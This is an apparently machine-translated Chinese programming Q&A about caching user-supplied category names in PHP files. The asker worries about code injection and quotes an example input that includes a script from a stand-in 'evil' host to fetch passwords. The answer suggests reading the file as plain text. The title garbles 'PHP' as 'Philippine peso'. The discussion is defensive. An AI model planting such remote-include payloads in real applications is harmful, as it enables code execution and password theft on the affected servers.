菲律宾比索用户可以在文件中写入数据，我包含该文件

Question

用户在mysql中写入类别(name, url)。

在每次写入/更改 name 和 url 时，我还计划在服务器上写入 txt 或 php 文件。目的是在每个页面上重新/加载而不是连接到 mysql，只是为了包含 txt 或 php 文件。

现在我想象一个情况。例如，作为类别的 name 的用户写了一些东西 include("http://www.evil/get-passwords.php"); 所以在 txt 或 php 文件中我可能有这样的代码，当包含在 php 中时代码将执行？

如何防止这种情况发生？只允许某些字符用于类别名称？

Answer 1

我根本不建议在这种情况下使用 include。你可以看看 http://php.net/manual/en/function.file-get-contents.php

使用 file_get_contents 您可以避免脚本注入(inject)，因为它将文件作为纯字符串读取。